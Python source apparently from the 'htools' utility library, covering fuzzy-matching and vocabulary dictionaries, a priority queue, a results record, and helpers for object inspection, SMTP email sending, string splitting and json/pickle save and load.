if not callable(getattr(cls, 'similar', None)):
raise TypeError('Children of _FuzzyDictBase must define method '
'`similar`.')
def _filter_similarity_pairs(self, pairs, mode='keys_values'):
"""
mode: str
Determines what information to return. In each case, items are
sorted in descending order of similarity.
- "keys_values": list of (key, value) tuples.
- "keys_similarities": list of (key, similarity) tuples.
- "keys_values_similarities": list of (key, value, similarity)
tuples.
- "keys": list of keys (strings).
- "values": list of values corresponding to the nearest keys (type
is dependent on what your dict values are).
"""
if mode == 'values':
return [self[p[0]] for p in pairs]
elif mode == 'keys_values':
return [(p[0], self[p[0]]) for p in pairs]
elif mode == 'keys_similarities':
return pairs
elif mode == 'keys':
return [p[0] for p in pairs]
elif mode == 'keys_values_similarities':
return [(p[0], self[p[0]], p[1]) for p in pairs]
else:
raise ValueError(
'Unrecognized value for `mode`. Should be one of ("values", '
'"keys", keys_values", "keys_similarities", or '
'"keys_values_similarities").'
)
class LSHDict(_FuzzyDictBase):
    """Dictionary that returns the value corresponding to a key's nearest
    neighbor if the key isn't present in the dict. This is intended for use
    as a word2index dict when using embeddings in deep learning: e.g. if we
    have domain embeddings for the top 100k websites, some of our options for
    dealing with unknown domains are:

    1. Encode all of them as <UNK>. This loses a lot of information.
    2. Create a FuzzyKeyDict which will search for similar keys using variants
    of Levenshtein distance. Lookup is O(N) and for 100k domains, that comes
    out to 0.6 seconds per item. We might have thousands or millions of
    lookups over the course of training so this can be a significant cost.
    3. Create an LSHDict (lookups are O(1)). Indexing into the dict as usual
    (e.g. my_lsh_dict[key]) will provide the key's index if present and the
    (approximate) nearest neighbor's index otherwise. Either way, the result
    can be used to index into your embedding layer.
    4. Create an LSHDict and use the `similar_values` method to return n>1
    neighbors. Then pass their indices to an Embedding layer and
    compute the sum/average/weighted average of the results. This may be
    preferable to #3 cases such as web domain lookup, where similar URLs are
    not guaranteed to represent similar sites. (This is basically
    equivalent to an EmbeddingBag layer, but in torch that doesn't store
    intermediate representations so we wouldn't be able to use our pretrained
    embeddings.)

    LSHDict does NOT support pickling as of version 6.0.6 (note: setitem seems
    to be called before init when unpickling, meaning we try to access
    self.forest in self._update_forest before it's been defined. Even if we
    change setitem so reindexing does not occur by default, it still tries to
    hash the new word and add it to the forest so unpickling will still fail).
    """
    def __init__(self, data, n_candidates=None, n_keys=3, ngram_size=3,
                 scorer=fuzz.ratio, chunksize=100):
        """
        Parameters
        ----------
        data: dict or list[tuple]
            The base dictionary. Unlike FuzzyKeyDict, we require this since
            adding items one by one is computationally infeasible for large
            datasets. Just build up your dictionary first.
        n_candidates: int or None
            Number of reasonably similar keys to retrieve when trying to index
            in with a key that's missing (or when using the `similar` method).
            You can override this in `similar` but not when using
            __getitem__'s square bracket syntax. If not specified, this will
            be auto initialized to vocab size/1,000, clipped to lie in
            [20, 500]. See `similar` docstring for more on this.
        n_keys: int
            Default number of similar keys to retrieve in `similar`.
        scorer: function
            Default scoring function to use to narrow `n_candidates` keys down
            to `n_keys`. Should be a fuzzywuzzy function where scores lie in
            [0, 100] and higher values indicate high similarity.
        chunksize: int
            Determines how many items to send to each process when hashing
            all the keys in the input data using multiprocessing. The default
            should be fine in most cases.
        """
        # NOTE(review): next(iter(data)) raises StopIteration if data is
        # empty, and for dict input it yields a *key* (so the second clause
        # checks the first key's length, not the data size) — confirm both
        # are intended.
        if len(data) < 10_000 and len(next(iter(data))) < 100:
            warnings.warn(
                'It looks like you\'re working with a relatively small '
                'amount of data. FuzzyKeyDict may be fast enough for your '
                'use case and would provide the set of strictly most similar '
                'keys rather than an approximation of that set.'
            )
        super().__init__(data)
        self.scorer = scorer
        self.hash_word = partial(self.lsh_hash_word, n=ngram_size)
        self.forest = MinHashLSHForest(num_perm=128)
        self.chunksize = chunksize
        self._initialize_forest()
        # Datasketch's LSH implementation usually gives pretty decent results
        # even with numbers as low as 5-10, but increasing that by a factor of
        # 10 comes with minimal time cost: Fuzzywuzzy matching doesn't get
        # particularly slow until we get into the thousands. The fact that
        # we cap this at 500 makes this lookup asymptotically O(1) while
        # FuzzyKeyDict's is O(N).
        self.n_candidates = n_candidates or np.clip(len(self) // 1_000,
                                                    20, 500)
        self.n_keys = n_keys
    def __setitem__(self, key, val):
        """Try to add keys all at once in the constructor because adding new
        keys can be extremely slow.
        """
        super().__setitem__(key, val)
        self._update_forest(key)
    def _update_forest(self, key, index=True):
        """Used in __setitem__ to update our LSH Forest. Forest's index method
        seems to recompute everything so adding items to a large LSHDict will
        be incredibly slow. Luckily, our deep learning use case rarely/never
        requires us to update object2index dicts after instantiation so that's
        not as troubling as it might seem.

        This used to be used by _initialize_forest as well but it didn't lend
        itself to parallelization as well since it acts on a shared, existing
        data structure.

        Parameters
        ----------
        key: str
        index: bool
            If True, reindex the forest (essentially making the key
            queryable). This should be False when initializing the forest so
            we just index once after everything's been added.
        """
        self.forest.add(key, self.hash_word(key))
        if index: self.forest.index()
    def _initialize_forest(self):
        """Called once in __init__ to add all items to LSH Forest. This is
        necessary because dict specifically calls its own __setitem__, not
        its children's.
        """
        # Hash all keys in parallel, then add them and index the forest a
        # single time (indexing per-add would be far too slow).
        hashes = parallelize(self.hash_word, self.keys(), total=len(self),
                             chunksize=self.chunksize)
        for hash_, key in zip(hashes, self.keys()):
            self.forest.add(key, hash_)
        self.forest.index()
    @add_docstring(_FuzzyDictBase._filter_similarity_pairs)
    def similar(self, key, mode='keys_values', n_candidates=None,
                n_keys=None, scorer=None):
        """Find a list of similar keys. This is used in __getitem__ but can
        also be useful as a user-facing method if you want to get more than
        1 neighbor or you want to get similarity scores as well.

        Parameters
        ----------
        key: str
            Word/URL/etc. to find similar keys to.
        mode: str
            See section below `Returns`.
        n_candidates: int or None
            Number of similar candidates to retrieve. This uses Jaccard
            Similarity which isn't always a great metric for string
            similarity. This is also where the LSH comes in so they're not
            strictly the n best candidates, but rather a close approximation
            of that set. If None, this will fall back to self.n_candidates.
            Keep in mind this determines how many keys are considered before
            fuzzy matching narrows them down to `n_keys`.
        n_keys: int or None
            Number of similar keys to return. If None, this will fall back to
            self.n_keys.
        scorer: function or None
            Fuzzywuzzy scoring function, e.g. fuzz.ratio or
            fuzz.partial_ratio, which will be used to score each candidate and
            select which to return. Higher scores indicate higher levels of
            similarity. If None, this will fall back to self.scorer.

        Returns
        -------
        list: List if `mode` is "keys" or "values". List of tuples otherwise.
        """
        candidates = self.forest.query(self.hash_word(key),
                                       n_candidates or self.n_candidates)
        if not candidates: raise KeyError('No similar keys found.')
        # List of (key, score) where higher means more similar.
        pairs = process.extract(key, candidates,
                                limit=n_keys or self.n_keys,
                                scorer=scorer or self.scorer)
        return self._filter_similarity_pairs(pairs, mode=mode)
    @staticmethod
    @add_docstring(ngrams)
    def lsh_hash_word(word, num_perm=128, **ngram_kwargs):
        """Hash an input word (str) and return a MinHash object that can be
        added to an LSHForest.

        Parameters
        ----------
        word: str
            Word to hash.
        num_perm: int
            Number of permutation functions used by MinHash.
        ngram_kwargs: any
            Forwarded to `ngrams`.

        Returns
        -------
        datasketch MinHash object
        """
        mhash = MinHash(num_perm=num_perm)
        for ng in ngrams(word, **ngram_kwargs):
            mhash.update(ng.encode('utf8'))
        return mhash
class FuzzyKeyDict(_FuzzyDictBase):
    """Dict that falls back to fuzzy string matching: indexing with a
    missing key returns the value stored under the most similar existing
    key. Useful e.g. when working with embeddings, where missing items can
    be mapped to the indices of one or more existing embeddings.

    Pickling seems to work but use with caution.

    TODO: consider desired behavior when comparing a dict and a
    FuzzyKeyDict with the same keys/values. They currently compare equal;
    arguments exist for either choice given how different lookup behavior
    is, even though this remains a dict subclass.

    Examples
    --------
    d = FuzzyKeyDict()
    d['dog'] = 0
    d['cat'] = 1
    d['alley cat'] = 2
    d['pig'] = 3
    d['cow'] = 4
    d['cowbell'] = 5
    d['baby cow'] = 6

    # Keys and similarity scores for the most similar keys.
    >>> d.similar('house cat', mode='keys_similarities')
    [('alley cat', 56), ('cat', 50), ('cowbell', 25)]

    # "house cat" not in dict so we get the value for the most similar key.
    >>> d['house cat']
    2

    # "cat" is in dict so __getitem__ functions like a regular dict.
    >>> d['cat']
    1
    """

    def __init__(self, data=(), n_keys=3, scorer=fuzz.ratio):
        """
        Parameters
        ----------
        data: Iterable (optional)
            Key-value pairs (e.g. a dict or list of tuples) used to
            populate the FuzzyKeyDict.
        n_keys: int
            Default number of similar keys for `similar` to retrieve.
        scorer: function
            Default fuzzywuzzy scoring function used by `similar`; scores
            lie in [0, 100] and higher values indicate higher similarity.
        """
        super().__init__(data)
        self.scorer = scorer
        self.n_keys = n_keys

    @add_docstring(_FuzzyDictBase._filter_similarity_pairs)
    def similar(self, key, mode='keys_values', n_keys=None, scorer=None):
        """Find the existing keys most similar to `key` and return relevant
        information about them (keys, values, similarity scores, or
        combinations thereof) depending on `mode`. Works whether or not
        `key` is present, though it's usually most useful when it's missing.

        Parameters
        ----------
        key: str
            String to find similar existing keys for.
        mode: str
            See section below `Returns`.
        n_keys: int or None
            Number of similar keys to return; falls back to self.n_keys
            when None.
        scorer: function or None
            Fuzzywuzzy scoring function (e.g. fuzz.ratio,
            fuzz.partial_ratio) used to rank candidates; falls back to
            self.scorer when None.

        Returns
        -------
        list: List if `mode` is "keys" or "values". List of tuples otherwise.
        """
        ranked = process.extract(key, self.keys(),
                                 limit=n_keys or self.n_keys,
                                 scorer=scorer or self.scorer)
        return self._filter_similarity_pairs(ranked, mode=mode)
class DotDict(dict):
    """dict subclass supporting attribute-style (dot) access alongside the
    usual bracket syntax. Picklable starting in htools>=6.0.6.
    """

    def __getattr__(self, key):
        return self[key]

    def __setattr__(self, key, val):
        self[key] = val

    def __delattr__(self, key):
        del self[key]

    def __getstate__(self):
        # Returning a plain dict (rather than resorting to __reduce__, which
        # dict subclasses often need) works here because __init__ has no
        # required arguments.
        return dict(self)

    def __setstate__(self, data):
        self.update(data)

    def __dir__(self):
        return self.keys()
class PriorityQueue:
    """List-like container that pops items in order of descending priority
    (larger priority values are processed first). Should be picklable.

    Bug fix: entries were previously pushed as bare (-priority, item)
    tuples, so when two priorities tied, heapq fell back to comparing the
    items themselves - raising TypeError for unorderable items (e.g. dicts).
    We now include a monotonically increasing counter as a tiebreaker, which
    also makes equal-priority items pop in FIFO order.
    """

    def __init__(self, items=None):
        """
        Parameters
        ----------
        items: list[tuple[any, numbers.Real]]
            Each tuple must be structured as (item, priority) where a larger
            priority means that item will be processed sooner.
        """
        self._items = []
        # Tiebreaker counter: guarantees heap entries never compare the
        # stored items themselves.
        self._counter = 0
        if items:
            for item, priority in items:
                self.put(item, priority)

    def put(self, item, priority):
        """Add an item with the given priority (larger = sooner)."""
        # Negate priority because heapq only provides a min heap.
        heappush(self._items, (-priority, self._counter, item))
        self._counter += 1

    def pop(self):
        """Remove and return the highest-priority item.

        Raises
        ------
        IndexError: if the queue is empty (with a clearer message than the
            one heapq raises).
        """
        try:
            return heappop(self._items)[-1]
        except IndexError:
            # Rewrite heapq's generic message to be more useful.
            raise IndexError('pop from empty queue')

    def __iter__(self):
        return self

    def __next__(self):
        """Makes PriorityQueue iterable, but note that this is a destructive
        action: the queue will be empty after iterating over it
        (e.g. `for item in queue: pass`). Numeric indexing is not allowed
        since heapq only guarantees which item comes next.
        """
        try:
            return self.pop()
        except IndexError:
            raise StopIteration

    def __contains__(self, key):
        # Entries are (-priority, counter, item); compare against items only.
        return key in (item for _, _, item in self._items)

    def __repr__(self):
        return f'{func_name(type(self))}({self._items})'
class VocabDict(dict):
    """Convenient interface for working with vocabularies where we want to map
    from word -> index and from index -> word. Note that item deletion is not
    supported, nor is changing the index of a key already in the dict.
    The typical use case only involves creating the object once and leaving it.

    Examples
    --------
    >>> w2i = {'the': 0, 'I': 1, 'door': 2, 'ocotopus': 3}
    >>> vocab = VocabDict(w2i)
    >>> vocab['door']
    2
    >>> vocab[2]
    'door'
    >>> vocab[[3, 0, 1]]
    ['octopus', 'the', 'I']
    >>> vocab['I', 2]
    [1, 'door]
    """
    def __init__(self, w2i):
        """
        Parameters
        ----------
        w2i: Mapping[str, int]
            Maps strings to numeric indices.
            Ex: {'a': 0, 'the': 1, ... 'ostrich': 100}. Indices must be
            consecutive and zero-indexed, though we don't force you to sort
            this before calling the constructor.
        """
        if sorted(w2i.values()) != list(range(max(w2i.values()) + 1)):
            raise ValueError(
                'w2i indices must be consecutive and zero-indexed.')
        # It's nice for the dict to be ordered appropriately, and we need to
        # sort anyway to ensure i2w is in the correct order.
        w2i = dict(sorted(w2i.items(), key=lambda x: x[1]))
        super().__init__(w2i)
        # i2w is a list where position i holds the word whose index is i.
        self.i2w = list(w2i)

    # Integer lookup: index -> word. The @dispatch decorator (multipledispatch)
    # picks the overload based on the key's runtime type.
    @dispatch(Integral)
    def __getitem__(self, i):
        return self.i2w[i]

    # String lookup: word -> index, i.e. regular dict behavior.
    # NOTE(review): presumably multipledispatch prefers str over the more
    # general Iterable overload below for string keys - confirm.
    @dispatch(str)
    def __getitem__(self, key):
        return super().__getitem__(key)

    # Iterable lookup: resolve each element individually (elements may mix
    # strings and integers, as in the class docstring example).
    @dispatch(Iterable)
    def __getitem__(self, vals):
        return [self[v] for v in vals]

    def __setitem__(self, key, i):
        # New entries must extend the vocab: str key, int index equal to the
        # current size, so indices stay consecutive and zero-indexed.
        if not isinstance(key, str):
            raise TypeError(f'key must have type str, not {type(key)}.')
        if not isinstance(i, int):
            raise TypeError(f'i must have type int, not {type(i)}.')
        if key in self:
            raise ValueError(
                f'Key {repr(key)} is already in {type(self).__name__}.')
        if i != len(self):
            raise ValueError(
                f'Invalid value i={repr(i)}. Should be {len(self)} '
                'because indices must be consecutive.')
        super().__setitem__(key, i)
        self.i2w.append(key)

    def __delitem__(self, key):
        # Deleting would leave a gap in the index range, so it's forbidden.
        raise RuntimeError(
            f'{type(self).__name__} does not support item deletion.')

    @classmethod
    def fromkeys(cls, keys):
        # Alternate constructor: assign indices 0..n-1 in iteration order.
        return cls({k: i for i, k in enumerate(keys)})

    def setdefault(self, key, default):
        # setdefault could silently insert an index that breaks the
        # consecutive-index invariant, so it's disallowed.
        raise RuntimeError(
            f'setdefault method not supported for {type(self).__name__}.')
class IndexedDict(OrderedDict):
    """OrderedDict that additionally supports positional (integer) indexing.
    The tradeoff is that integers can no longer serve as keys, since an int
    lookup would be ambiguous. Should be picklable.
    """

    def __init__(self, data=None):
        # The parent constructor requires an iterable, so map None to {}.
        super().__init__(data or {})

    def __setitem__(self, key, val):
        if isinstance(key, int):
            raise TypeError('`key` must not be an integer.')
        super().__setitem__(key, val)

    def __getitem__(self, key):
        if not isinstance(key, int):
            return super().__getitem__(key)
        # Integer -> positional lookup (negative indices work too).
        return list(self.values())[key]
class LambdaDict(dict):
    """Default dict whose default depends on the missing key. Unlike
    collections.defaultdict (whose factory takes no arguments), the default
    function here receives the missing key as its argument.
    """

    def __init__(self, default_function):
        """
        Parameters
        ----------
        default_function: function
            Called with a missing key as its only argument; the return value
            is stored under that key and returned.
        """
        super().__init__()
        self.f = default_function

    def __missing__(self, key):
        # Cache the computed default so subsequent lookups are plain dict
        # accesses.
        val = self.f(key)
        self[key] = val
        return val
class Results:
    """Lightweight record for returning data from a function: supports
    attribute access (like DotDict), tuple-style unpacking (like a
    namedtuple), and pickling. Keys mostly serve as documentation;
    iteration yields *values*, not keys.

    Bug fix: __getstate__ previously dropped the nonexistent key 'keys'
    instead of '_keys', so the pickled state still contained '_keys' and
    __setstate__ corrupted it on load (every key appeared twice in _keys,
    inflating len()). __getstate__ now excludes '_keys' so __setstate__
    rebuilds it cleanly from the remaining entries' insertion order.
    """

    def __init__(self, **kwargs):
        # Reserve names used by the class API so attribute access stays sane.
        for x in ('items', 'keys', 'values', '_keys', '_asdict', 'from_dict'):
            if x in kwargs:
                raise ValueError(f'{x!r} is a reserved attribute name.')
        self._keys = list(kwargs)
        self.__dict__.update(kwargs)

    @classmethod
    def from_dict(cls, data):
        """Alternate constructor from an existing mapping."""
        return cls(**data)

    def __repr__(self):
        arg_strs = ", ".join(f'{k}={v!r}' for k, v in self.items())
        return f'{type(self).__name__}({arg_strs})'

    def __iter__(self):
        """Unlike dict, iterate over values because this is still closer to
        a tuple at heart.
        """
        yield from self.values()

    def __len__(self):
        return len(self._keys)

    def __getitem__(self, i:int):
        """Accepts an integer index (or slice) and returns value(s), NOT
        keys, so the object unpacks like a tuple.
        """
        keys = self._keys[i]
        # A slice of _keys yields a list -> return a new Results subset.
        if isinstance(keys, list):
            return type(self)(**{key: getattr(self, key) for key in keys})
        return getattr(self, keys)

    def __getstate__(self):
        # Exclude '_keys' (NOT 'keys' - that was the old bug); __setstate__
        # reconstructs it from the dict's insertion order.
        return {k: v for k, v in vars(self).items() if k != '_keys'}

    def __setstate__(self, data):
        self._keys = []
        for k, v in data.items():
            self._keys.append(k)
            self.__dict__[k] = v

    def __eq__(self, o2):
        return vars(self) == vars(o2)

    def items(self):
        return self._asdict().items()

    def keys(self):
        return self._asdict().keys()

    def values(self):
        return self._asdict().values()

    def _asdict(self):
        """Matches the namedtuple interface. Built by hand rather than via
        dict(self) because our __getitem__ is positional, not key-based.
        """
        return {k: getattr(self, k) for k in self._keys}
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
from bz2 import BZ2File
from collections import Counter, Sequence, Iterable, \
Mapping
from functools import partial
import gc
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email import encoders
from inspect import signature, getattr_static, ismethod, getmembers, getmodule
from itertools import chain
import json
import mimetypes
from multiprocessing import Pool
import os
from pathlib import Path
import pickle
from random import choice, choices
import re
import smtplib
from string import ascii_letters
from subprocess import run, check_output
import sys
import time
from tqdm.auto import tqdm
import warnings
import wordninja as wn
from htools.config import get_credentials, get_default_user
class InvalidArgumentError(Exception):
    """Raised when a function receives invalid or mutually inconsistent
    arguments (e.g. an unsupported file extension in `save`/`load`, or
    passing both `keep` and `drop` to `select`).
    """
    pass
def hdir(obj, magics=False, internals=False):
    """List an object's methods and attributes, excluding magic methods by
    default.

    Parameters
    -----------
    obj: any type
        Object whose methods and attributes we want to inspect.
    magics: bool
        If True, include magic methods (e.g. __name__, __hash__).
        Default False.
    internals: bool
        If True, include internal methods (e.g. _dfs, _name).
        Default False.

    Returns
    --------
    dict
        Maps each method/attribute name to the string 'method' or
        'attribute'.
    """
    res = {}
    for name in dir(obj):
        # Exclude magics or internals unless requested.
        if name.startswith('__') and not magics:
            continue
        if re.match('_[^_]', name) and not internals:
            continue
        # Some attributes error on mere access (e.g. df.sparse on a
        # non-sparse pandas DataFrame) - skip those.
        try:
            is_callable = callable(getattr(obj, name))
        except Exception:
            continue
        res[name] = 'method' if is_callable else 'attribute'
    return res
def tdir(obj, **kwargs):
    """Variant of the builtin `dir` that maps attribute names to their
    types. Methods are excluded since calling them could change the
    object's state.

    Parameters
    ----------
    obj: any type
        The object to examine.
    kwargs: bool
        Forwarded to hdir (`magics`, `internals`); see hdir docs.

    Returns
    -------
    dict[str, type]: Maps each attribute name to that attribute's type.
    """
    res = {}
    for name, kind in hdir(obj, **kwargs).items():
        if kind == 'attribute':
            res[name] = type(getattr(obj, name))
    return res
def hasarg(func, arg):
    """Check whether a function's signature includes a given argument name.
    Works for *args/**kwargs too if you omit the stars (see example).

    Parameters
    ----------
    func: function
    arg: str
        Name of argument to look for.

    Returns
    -------
    bool

    Example
    -------
    def foo(a, b=6, *args):
        return

    >>> hasarg(foo, 'b')
    True

    >>> hasarg(foo, 'args')
    True

    >>> hasarg(foo, 'c')
    False
    """
    params = signature(func).parameters
    return arg in params
def quickmail(subject, message, to_email, from_email=None,
              attach_paths=(), verbose=True, password=None):
    """Send an email (or SMS via a carrier email gateway) through a gmail
    or outlook account.

    Parameters
    -----------
    subject: str
        Subject line of email.
    message: str
        Body of email. If falsy, no text body is attached.
    to_email: str
        Recipient's email. This can also be a verizon phone number in the
        form 3332221111@vtext.com (notice no extra leading 1), in which case
        this will send an sms. In theory, you should be able to send mms
        (i.e. include image(s)) by using a format like 3332221111@vzwtext.com,
        but this doesn't seem to be working as of 2/10/22.
    from_email: str or None
        Sending address. If None, falls back to the default user from
        htools.config; must be a gmail.com or outlook.com address.
    attach_paths: str or listlike
        Paths to files to attach. Currently supports text (.txt, .md, etc.;
        as of 2/11/22, gmail blocks executable attachments like .py)
        and image (.jpg, .png, etc.) files.
    verbose: bool
        If True, print a confirmation message after the email is sent.
    password: str or None
        Password for `from_email`. If None, it's looked up via
        htools.config.get_credentials.

    Returns
    --------
    None
    """
    # Load email username. Error handling takes place in config functions.
    from_email = from_email or get_default_user()
    if not from_email: return None
    # Load email password.
    password = password or get_credentials(from_email)
    if not password: return None
    # Create message and add text if specified.
    msg = MIMEMultipart()
    msg['Subject'] = subject
    msg['From'] = from_email
    msg['To'] = to_email
    if message: msg.attach(MIMEText(message))
    # Load and attach file(s). Paths must be strings, not Paths, for
    # mimetypes. The MIME class, read mode, and encoding scheme depend on
    # whether the file is text or an image.
    for path in map(str, tolist(attach_paths)):
        ftype = mimetypes.guess_type(path)[0].split('/')[0]
        if ftype == 'text':
            mime_cls = MIMEText
            mode = 'r'
            # Text needs no base64 encoding; identity is a no-op.
            encoder = identity
            kwargs = {}
        elif ftype == 'image':
            mime_cls = MIMEImage
            mode = 'rb'
            encoder = encoders.encode_base64
            kwargs = {'name': os.path.basename(path)}
        else:
            raise ValueError('Attached file should be a text or image file. '
                             f'We parsed your file as type {ftype}.')
        with open(path, mode) as f:
            attachment = mime_cls(f.read(), **kwargs)
        # Setting Content-Disposition makes the file
        # show up as an attachment rather than an embedded object, but
        # sometimes the latter might be preferable.
        attachment.add_header('Content-Disposition', 'attachment',
                              filename=os.path.basename(path))
        encoder(attachment)
        msg.attach(attachment)
    # Access server and send email. Only gmail and outlook SMTP hosts are
    # supported.
    hosts = {'gmail.com': 'smtp.gmail.com',
             'outlook.com': 'smtp-mail.outlook.com'}
    try:
        host = hosts[from_email.split('@')[-1]]
    except KeyError:
        raise ValueError(f'Unrecognized host {from_email.split("@")[-1]}. '
                         f'We currently support {hosts.keys()}.')
    server = smtplib.SMTP(host=host, port=587)
    server.starttls()
    server.login(user=from_email, password=password)
    server.sendmail(from_email, to_email, msg.as_string())
    if verbose: print(f'Email sent to {to_email}.')
def hsplit(text, sep, group=True, attach=True):
    """Flexible string splitting that retains the delimiter, unlike
    the built-in str.split() method.

    NOTE: I recently observed behavior suggesting separators with special
    characters (e.g. "\n") may not work as expected for some settings. It
    should work when group=True and attach=True though since I rewrote that
    with new logic without the re module.

    Parameters
    -----------
    text: str
        The input text to be split.
    sep: str
        The delimiter to be split on.
    group: bool
        Specifies whether to group consecutive delimiters together (True),
        or to separate them (False).
    attach: bool
        Specifies whether to attach the delimiter to the string that preceeds
        it (True), or to detach it so it appears in the output list as its own
        item (False).

    Returns
    --------
    list[str]

    Examples
    ---------
    text = "Score -- Giants win 6-5"
    sep = '-'

    # Case 0.1: Delimiters are grouped together and attached to the preceding
    word.
    >> hsplit(text, sep, group=True, attach=True)
    >> ['Score --', ' Giants win 6-', '5']

    # Case 0.2: Delimiters are grouped together but are detached from the
    preceding word, instead appearing as their own item in the output list.
    >> hsplit(text, sep, group=True, attach=False)
    >> ['Score ', '--', ' Giants win 6', '-', '5']

    Case 1.1: Delimiters are retained and attached to the preceding string.
    If the delimiter occurs multiple times consecutively, only the first
    occurrence is attached, and the rest appear as individual items in the
    output list.
    >> hsplit(text, sep, group=False, attach=True)
    >> ['Score -', '-', ' Giants win 6-', '5']

    # Case 1.2: Delimiters are retained but are detached from the preceding
    string. Each instance appears as its own item in the output list.
    >> hsplit(text, sep, group=False, attach=False)
    >> ['Score ', '-', '-', ' Giants win 6', '-', '5']
    """
    # Escape so separators like '.' or '*' aren't treated as regex
    # metacharacters.
    sep_re = re.escape(sep)
    # Matches a run of non-separator chars followed by zero or more seps.
    regex = f'[^{sep_re}]*{sep_re}*'
    ##########################################################################
    # Case 0: Consecutive delimiters are grouped together.
    ##########################################################################
    if group:
        # Subcase 0.1
        if attach:
            return _grouped_split(text, sep)
        # Subcase 0.2: capture group in re.split keeps the (grouped)
        # separators as their own list items; filter drops empty strings.
        else:
            return [word for word in re.split(f'({sep_re}+)', text) if word]
    ##########################################################################
    # Case 1: Consecutive delimiters are NOT grouped together.
    ##########################################################################
    words = text.split(sep)
    # Subcase 1.1: trim the trailing '*' so at most one sep attaches to each
    # preceding chunk; extra consecutive seps match as standalone items.
    if attach:
        return [word for word in re.findall(regex[:-1]+'?', text) if word]
    # Subcase 1.2: interleave words with separators, then drop empties and
    # the final extra separator appended by zip.
    return [word for word in chain(*zip(words, [sep]*len(words))) if word][:-1]
def _grouped_split(text, sep):
"""Hsplit helper for case where group=True and attach=True (see hsplit
docs). Old re.find() method didn't work right when sep had special
characters (e.g. "\n").
"""
res = []
toks = text.split(sep)
max_idx = len(toks) - 1
for i, tok in enumerate(toks):
if tok:
if i < max_idx: tok += sep
res.append(tok)
elif i < max_idx:
if res:
res[-1] += sep
else:
res.append(sep)
return res
def rmvars(*args):
    """Free up memory by deleting global variables from the *caller's*
    module and then forcing garbage collection. Htools 3.0 does not provide
    a way to do this for local variables.

    Bug fix: the old implementation called `globals()` inside this function,
    which refers to the module where rmvars is *defined*, not the caller's
    module, so it raised KeyError for any variable defined by the caller.
    We now grab the caller's global namespace from its stack frame.
    (sys._getframe is CPython-specific but so is this use case.)

    Parameters
    ----------
    args: str
        One or more variable names to delete. Do not pass in the variable
        itself.

    Returns
    -------
    None
    """
    # Frame 1 is the immediate caller; its f_globals is the caller's module
    # namespace.
    caller_globals = sys._getframe(1).f_globals
    for arg in args:
        del caller_globals[arg]
    gc.collect()
def print_object_sizes(space, limit=None, exclude_underscore=True):
    """Print variable names and in-memory sizes for currently defined
    objects, largest first.

    Parameters
    -----------
    space: dict
        locals(), globals(), or vars()
    limit: int or None
        Optionally cap how many objects to consider (default None for no
        limit).
    exclude_underscore: bool
        If True (default), skip names that start with an underscore.
    """
    pairs = ((name, sys.getsizeof(obj)) for name, obj in space.items())
    ranked = sorted(pairs, key=lambda pair: pair[1], reverse=True)
    for name, size in ranked[:limit]:
        if exclude_underscore and name.startswith('_'):
            continue
        print(name, size)
def eprint(arr, indent=2, spacing=1):
    """Enumerated print: show one item per line, each prefixed with its
    index in the iterable.

    Parameters
    -----------
    arr: iterable
        The items to print.
    indent: int
        Width reserved for the index column. Default 2, so columns stay
        aligned for the expected use case of <100 items.
    spacing: int
        Number of newlines after each item: 1 (default) = single-spaced,
        2 = double-spaced, and so on.

    Returns
    --------
    None
    """
    terminator = '\n' * spacing
    for idx, val in enumerate(arr):
        print(f'{idx:>{indent}}: {val}', end=terminator)
def _read_write_args(path, mode):
"""Helper for `save` and `load` functions.
Parameters
----------
path: str
Path to read/write object from/to.
mode: str
'w' for writing files (as in `save`), 'r' for reading files
(as in `load`).
Returns
-------
tuple: Function to open file, mode to open file with (str), object to open
file with.
"""
ext = path.rpartition('.')[-1]
# Store in dict to make it easier to add additional formats in future.
ext2data = {
'json': (open, '', json),
'pkl': (open, 'b', pickle),
'zip': (BZ2File, '', pickle),
}
if ext not in ext2data:
raise InvalidArgumentError(
'Invalid extension. Make sure your filename ends with '
'.json, .pkl, or .zip.'
)
opener, mode_suffix, saver = ext2data[ext]
return opener, mode + mode_suffix, saver
def save(obj, path, mode_pre='w', verbose=True):
    """Serialize an object to disk as text, pickle, zipped pickle, or json.

    Parameters
    -----------
    obj: any
        Object to save. Serialization happens inside this function - pass
        the raw object, not a pre-converted one.
    path: str
        Output file name. Extension determines the format: .txt/.sh/.md/.py
        for plain text, .pkl for pickle, .zip for zipped pickle, .json for
        json.
    mode_pre: str
        'w' to overwrite or 'a' to append (text formats).
    verbose: bool
        If True, print a message confirming the write along with its path.

    Returns
    -------
    None
    """
    path = Path(path)
    # Create parent dirs as needed so callers don't have to.
    os.makedirs(path.parent, exist_ok=True)
    if verbose:
        print(f'Writing data to {path}.')
    if path.suffix[1:] in ('txt', 'sh', 'md', 'py'):
        with path.open(mode_pre) as f:
            f.write(obj)
        return
    opener, mode, saver = _read_write_args(str(path), mode_pre)
    with opener(path, mode) as f:
        saver.dump(obj, f)
def load(path, verbose=True):
    """Load a file written by `save` (text, pickle, zipped pickle, or
    json); the format is inferred from the extension.

    Parameters
    ----------
    path : str
        File to load. Must end with .txt, .sh, .md, .py, .json, .pkl, or
        .zip.
    verbose : bool, optional
        If True, print where the object was loaded from.

    Returns
    -------
    object: The Python object stored in the specified file.
    """
    path = Path(path)
    if path.suffix[1:] in ('txt', 'sh', 'md', 'py'):
        return path.read_text()
    opener, mode, saver = _read_write_args(str(path), 'r')
    with opener(path, mode) as f:
        loaded = saver.load(f)
    if verbose:
        print(f'Object loaded from {path}.')
    return loaded
def dict_sum(*args):
    """Combine two or more dictionaries with numeric values into one,
    summing the values of any key that appears in multiple inputs.

    This differs from merging via {**d1, **d2}, which keeps only d2's value
    for shared keys rather than adding the values together.

    Parameters
    -----------
    *args: dicts
        2 or more dictionaries with numeric values.

    Returns
    --------
    dict: Contains every key appearing in any input dict; each value is the
        sum of that key's values across all dicts that contain it.

    Examples
    ---------
    >>> d1 = {'a': 1, 'b': 2, 'c': 3}
